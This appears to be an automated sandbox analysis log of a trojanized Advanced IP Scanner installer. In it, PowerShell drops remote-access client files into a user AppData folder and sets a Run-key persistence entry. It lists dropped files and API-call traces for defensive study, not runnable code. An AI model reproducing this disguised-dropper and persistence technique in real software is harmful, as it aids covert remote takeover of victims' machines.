                                  Source: C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmpFile created: C:\Program Files (x86)\Advanced IP Scanner\api-ms-win-core-localization-l1-2-0.dll (copy)Jump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmpFile created: C:\Program Files (x86)\Advanced IP Scanner\is-012CR.tmpJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmpFile created: C:\Program Files (x86)\Advanced IP Scanner\advanced_ip_scanner_console.exe (copy)Jump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmpFile created: C:\Program Files (x86)\Advanced IP Scanner\is-FOUIF.tmpJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmpFile created: C:\Program Files (x86)\Advanced IP Scanner\is-QAKOH.tmpJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmpFile created: C:\Program Files (x86)\Advanced IP Scanner\api-ms-win-core-heap-l1-1-0.dll (copy)Jump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmpFile created: C:\Program Files (x86)\Advanced IP Scanner\is-5BNS6.tmpJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmpFile created: C:\Program Files (x86)\Advanced IP Scanner\msvcp140.dll (copy)Jump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmpFile created: C:\Program Files (x86)\Advanced IP Scanner\is-FNUE4.tmpJump to dropped file
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\SystemUtil\msvcr100.dllJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmpFile created: C:\Program Files (x86)\Advanced IP Scanner\api-ms-win-core-interlocked-l1-1-0.dll (copy)Jump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmpFile created: C:\Program Files (x86)\Advanced IP Scanner\advanced_ip_scanner.exe (copy)Jump to dropped file
                                  Source: C:\Users\user\Desktop\KC0uZWwr8p.exeFile created: C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmpJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmpFile created: C:\Program Files (x86)\Advanced IP Scanner\api-ms-win-crt-runtime-l1-1-0.dll (copy)Jump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmpFile created: C:\Program Files (x86)\Advanced IP Scanner\api-ms-win-core-processthreads-l1-1-0.dll (copy)Jump to dropped file
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\SystemUtil\HTCTL32.DLLJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmpFile created: C:\Program Files (x86)\Advanced IP Scanner\Qt5Network.dll (copy)Jump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmpFile created: C:\Program Files (x86)\Advanced IP Scanner\api-ms-win-core-rtlsupport-l1-1-0.dll (copy)Jump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmpFile created: C:\Program Files (x86)\Advanced IP Scanner\is-HA61E.tmpJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmpFile created: C:\Program Files (x86)\Advanced IP Scanner\api-ms-win-core-file-l1-1-0.dll (copy)Jump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmpFile created: C:\Program Files (x86)\Advanced IP Scanner\is-5JUJC.tmpJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmpFile created: C:\Program Files (x86)\Advanced IP Scanner\Qt5Widgets.dll (copy)Jump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmpFile created: C:\Program Files (x86)\Advanced IP Scanner\is-5C3J6.tmpJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmpFile created: C:\Program Files (x86)\Advanced IP Scanner\is-BPHN2.tmpJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmpFile created: C:\Program Files (x86)\Advanced IP Scanner\unins000.exe (copy)Jump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmpFile created: C:\Program Files (x86)\Advanced IP Scanner\printsupport\is-F8M60.tmpJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmpFile created: C:\Program Files (x86)\Advanced IP Scanner\api-ms-win-crt-multibyte-l1-1-0.dll (copy)Jump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmpFile created: C:\Program Files (x86)\Advanced IP Scanner\api-ms-win-crt-math-l1-1-0.dll (copy)Jump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmpFile created: C:\Program Files (x86)\Advanced IP Scanner\api-ms-win-crt-environment-l1-1-0.dll (copy)Jump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmpFile created: C:\Program Files (x86)\Advanced IP Scanner\is-TE3AT.tmpJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmpFile created: C:\Program Files (x86)\Advanced IP Scanner\is-ET38G.tmpJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmpFile created: C:\Program Files (x86)\Advanced IP Scanner\api-ms-win-core-synch-l1-1-0.dll (copy)Jump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmpFile created: C:\Program Files (x86)\Advanced IP Scanner\api-ms-win-core-string-l1-1-0.dll (copy)Jump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmpFile created: C:\Program Files (x86)\Advanced IP Scanner\api-ms-win-core-timezone-l1-1-0.dll (copy)Jump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmpFile created: C:\Program Files (x86)\Advanced IP Scanner\api-ms-win-core-synch-l1-2-0.dll (copy)Jump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmpFile created: C:\Program Files (x86)\Advanced IP Scanner\api-ms-win-crt-heap-l1-1-0.dll (copy)Jump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmpFile created: C:\Program Files (x86)\Advanced IP Scanner\is-UCVS8.tmpJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmpFile created: C:\Program Files (x86)\Advanced IP Scanner\platforms\is-1PGBC.tmpJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmpFile created: C:\Program Files (x86)\Advanced IP Scanner\is-L3ANO.tmpJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmpFile created: C:\Program Files (x86)\Advanced IP Scanner\is-AQQBN.tmpJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmpFile created: C:\Program Files (x86)\Advanced IP Scanner\api-ms-win-core-processenvironment-l1-1-0.dll (copy)Jump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmpFile created: C:\Program Files (x86)\Advanced IP Scanner\is-MR0EO.tmpJump to dropped file
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\SystemUtil\pcicapi.dllJump to dropped file
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\SystemUtil\PCICL32.DLLJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmpFile created: C:\Program Files (x86)\Advanced IP Scanner\is-JOPC8.tmpJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmpFile created: C:\Program Files (x86)\Advanced IP Scanner\is-14FKM.tmpJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmpFile created: C:\Program Files (x86)\Advanced IP Scanner\is-2D48T.tmpJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmpFile created: C:\Program Files (x86)\Advanced IP Scanner\is-P2PON.tmpJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmpFile created: C:\Program Files (x86)\Advanced IP Scanner\api-ms-win-core-errorhandling-l1-1-0.dll (copy)Jump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmpFile created: C:\Program Files (x86)\Advanced IP Scanner\libeay32.dll (copy)Jump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmpFile created: C:\Program Files (x86)\Advanced IP Scanner\api-ms-win-core-profile-l1-1-0.dll (copy)Jump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmpFile created: C:\Program Files (x86)\Advanced IP Scanner\Qt5WinExtras.dll (copy)Jump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmpFile created: C:\Program Files (x86)\Advanced IP Scanner\is-0LL3Q.tmpJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmpFile created: C:\Program Files (x86)\Advanced IP Scanner\api-ms-win-crt-string-l1-1-0.dll (copy)Jump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmpFile created: C:\Program Files (x86)\Advanced IP Scanner\is-495HA.tmpJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmpFile created: C:\Program Files (x86)\Advanced IP Scanner\platforms\qwindows.dll (copy)Jump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmpFile created: C:\Program Files (x86)\Advanced IP Scanner\is-DMJVK.tmpJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmpFile created: C:\Program Files (x86)\Advanced IP Scanner\is-IK3SG.tmpJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmpFile created: C:\Program Files (x86)\Advanced IP Scanner\Qt5Gui.dll (copy)Jump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmpFile created: C:\Program Files (x86)\Advanced IP Scanner\is-DLE8L.tmpJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmpFile created: C:\Program Files (x86)\Advanced IP Scanner\is-593G3.tmpJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmpFile created: C:\Program Files (x86)\Advanced IP Scanner\is-5KHP2.tmpJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmpFile created: C:\Program Files (x86)\Advanced IP Scanner\is-FLT6F.tmpJump to dropped file
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\SystemUtil\TCCTL32.DLLJump to dropped file
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\SystemUtil\AudioCapture.dllJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmpFile created: C:\Program Files (x86)\Advanced IP Scanner\is-V71S3.tmpJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmpFile created: C:\Program Files (x86)\Advanced IP Scanner\is-DORH9.tmpJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmpFile created: C:\Program Files (x86)\Advanced IP Scanner\is-QVRL0.tmpJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmpFile created: C:\Program Files (x86)\Advanced IP Scanner\is-9GMK5.tmpJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmpFile created: C:\Program Files (x86)\Advanced IP Scanner\is-RT7U6.tmpJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmpFile created: C:\Program Files (x86)\Advanced IP Scanner\api-ms-win-crt-process-l1-1-0.dll (copy)Jump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmpFile created: C:\Program Files (x86)\Advanced IP Scanner\api-ms-win-crt-locale-l1-1-0.dll (copy)Jump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmpFile created: C:\Program Files (x86)\Advanced IP Scanner\api-ms-win-core-console-l1-1-0.dll (copy)Jump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmpFile created: C:\Program Files (x86)\Advanced IP Scanner\api-ms-win-core-libraryloader-l1-1-0.dll (copy)Jump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmpFile created: C:\Program Files (x86)\Advanced IP Scanner\api-ms-win-core-namedpipe-l1-1-0.dll (copy)Jump to dropped file
                                  Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exeCode function: 7_2_685A7030 ctl_open,LoadLibraryA,InitializeCriticalSection,CreateEventA,CreateEventA,CreateEventA,CreateEventA,WSAStartup,_malloc,_memset,_calloc,_malloc,_memset,_malloc,_memset,GetTickCount,CreateThread,SetThreadPriority,GetModuleFileNameA,GetPrivateProfileIntA,GetModuleHandleA,CreateMutexA,timeBeginPeriod,7_2_685A7030
                                  Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exeCode function: 7_2_685950E0 CreateFileA,wsprintfA,GetPrivateProfileIntA,GetPrivateProfileIntA,wsprintfA,CreateFileA,GetFileSize,GetPrivateProfileIntA,SetFilePointer,FlushFileBuffers,CloseHandle,wsprintfA,CreateFileA,__itow,WritePrivateProfileStringA,7_2_685950E0
                                  Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exeCode function: 7_2_68595117 GetPrivateProfileIntA,wsprintfA,CreateFileA,GetFileSize,GetPrivateProfileIntA,SetFilePointer,FlushFileBuffers,CloseHandle,wsprintfA,CreateFileA,__itow,WritePrivateProfileStringA,7_2_68595117
                                  Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exeCode function: 7_2_68595490 GetPrivateProfileIntA,7_2_68595490
                                  Source: C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmpFile created: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Network ToolsJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmpFile created: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Network Tools\Advanced IP Scanner for Windows.lnkJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run NetUtilityAppJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run NetUtilityAppJump to behavior

                                  Hooking and other Techniques for Hiding and Protection

                                  barindex
                                  Loading BitLocker PowerShell Module
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                                  Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exeCode function: 7_2_110251B0 SetWindowPos,GetMenu,DrawMenuBar,GetMenu,DeleteMenu,UpdateWindow,IsIconic,SetTimer,KillTimer,7_2_110251B0
                                  Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exeCode function: 7_2_111575D0 IsIconic,ShowWindow,BringWindowToTop,IsWindow,IsIconic,ShowWindow,BringWindowToTop,7_2_111575D0
                                  Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exeCode function: 7_2_111575D0 IsIconic,ShowWindow,BringWindowToTop,IsWindow,IsIconic,ShowWindow,BringWindowToTop,7_2_111575D0
                                  Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exeCode function: 7_2_11025600 IsIconic,BringWindowToTop,GetCurrentThreadId,7_2_11025600
                                  Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exeCode function: 7_2_111579D0 _memset,SendMessageA,SendMessageA,ShowWindow,SendMessageA,IsIconic,IsZoomed,ShowWindow,GetDesktopWindow,TileWindows,7_2_111579D0
                                  Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exeCode function: 7_2_110238D0 BringWindowToTop,SetWindowPos,SetWindowPos,SetWindowPos,GetWindowLongA,SetWindowLongA,GetDlgItem,EnableWindow,GetMenu,DeleteMenu,DrawMenuBar,SetWindowPos,IsIconic,UpdateWindow,SetTimer,KillTimer,7_2_110238D0
                                  Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exeCode function: 7_2_110BFDD0 IsIconic,ShowWindow,BringWindowToTop,GetCurrentThreadId,7_2_110BFDD0
                                  Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exeCode function: 7_2_11023FB0 _memset,_strncpy,_memset,_strncpy,IsWindow,IsIconic,BringWindowToTop,GetCurrentThreadId,7_2_11023FB0
                                  Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exeCode function: 7_2_110CA3C0 GetWindowRect,IsIconic,GetClientRect,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,IsIconic,GetWindowRect,SetWindowPos,7_2_110CA3C0
                                  Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exeCode function: 7_2_110CA3C0 GetWindowRect,IsIconic,GetClientRect,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,IsIconic,GetWindowRect,SetWindowPos,7_2_110CA3C0
                                  Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exeCode function: 7_2_11110220 IsIconic,GetTickCount,CreateRectRgn,GetClientRect,SetStretchBltMode,CreateRectRgn,GetClipRgn,OffsetRgn,GetRgnBox,SelectClipRgn,StretchBlt,SelectClipRgn,DeleteObject,StretchBlt,StretchBlt,GetWindowOrgEx,StretchBlt,GetKeyState,CreatePen,CreatePen,SelectObject,Polyline,Sleep,SelectObject,Polyline,Sleep,SelectObject,DeleteObject,DeleteObject,BitBlt,7_2_11110220
                                  Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exeCode function: 8_2_110251B0 SetWindowPos,GetMenu,DrawMenuBar,GetMenu,DeleteMenu,UpdateWindow,IsIconic,SetTimer,KillTimer,8_2_110251B0
                                  Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exeCode function: 8_2_111575D0 IsIconic,ShowWindow,BringWindowToTop,IsWindow,IsIconic,ShowWindow,BringWindowToTop,8_2_111575D0
                                  Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exeCode function: 8_2_111575D0 IsIconic,ShowWindow,BringWindowToTop,IsWindow,IsIconic,ShowWindow,BringWindowToTop,8_2_111575D0
                                  Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exeCode function: 8_2_11025600 IsIconic,BringWindowToTop,GetCurrentThreadId,8_2_11025600
                                  Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exeCode function: 8_2_111579D0 _memset,SendMessageA,SendMessageA,ShowWindow,SendMessageA,IsIconic,IsZoomed,ShowWindow,GetDesktopWindow,TileWindows,8_2_111579D0
                                  Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exeCode function: 8_2_110238D0 BringWindowToTop,SetWindowPos,SetWindowPos,SetWindowPos,GetWindowLongA,SetWindowLongA,GetDlgItem,EnableWindow,GetMenu,DeleteMenu,DrawMenuBar,SetWindowPos,IsIconic,UpdateWindow,SetTimer,KillTimer,8_2_110238D0
                                  Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exeCode function: 8_2_110BFDD0 IsIconic,ShowWindow,BringWindowToTop,GetCurrentThreadId,8_2_110BFDD0
                                  Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exeCode function: 8_2_11023FB0 _memset,_strncpy,_memset,_strncpy,IsWindow,IsIconic,BringWindowToTop,GetCurrentThreadId,8_2_11023FB0
                                  Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exeCode function: 8_2_110CA3C0 GetWindowRect,IsIconic,GetClientRect,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,IsIconic,GetWindowRect,SetWindowPos,8_2_110CA3C0
                                  Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exeCode function: 8_2_110CA3C0 GetWindowRect,IsIconic,GetClientRect,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,IsIconic,GetWindowRect,SetWindowPos,8_2_110CA3C0
                                  Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exeCode function: 8_2_11110220 IsIconic,GetTickCount,CreateRectRgn,GetClientRect,SetStretchBltMode,CreateRectRgn,GetClipRgn,OffsetRgn,GetRgnBox,SelectClipRgn,StretchBlt,SelectClipRgn,DeleteObject,StretchBlt,StretchBlt,GetWindowOrgEx,StretchBlt,GetKeyState,CreatePen,CreatePen,SelectObject,Polyline,Sleep,SelectObject,Polyline,Sleep,SelectObject,DeleteObject,DeleteObject,BitBlt,8_2_11110220
                                  Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exeCode function: 7_2_11029230 GetTickCount,LoadLibraryA,GetProcAddress,InternetCloseHandle,SetLastError,GetProcAddress,GetLastError,_free,GetProcAddress,GetProcAddress,InternetOpenA,SetLastError,SetLastError,SetLastError,_free,GetProcAddress,SetLastError,GetProcAddress,InternetConnectA,GetProcAddress,SetLastError,SetLastError,GetProcAddress,HttpOpenRequestA,SetLastError,GetProcAddress,SetLastError,GetLastError,GetProcAddress,SetLastError,GetLastError,GetDesktopWindow,GetProcAddress,SetLastError,GetProcAddress,SetLastError,GetProcAddress,SetLastError,FreeLibrary,7_2_11029230
                                  Source: C:\Users\user\Desktop\KC0uZWwr8p.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmpProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
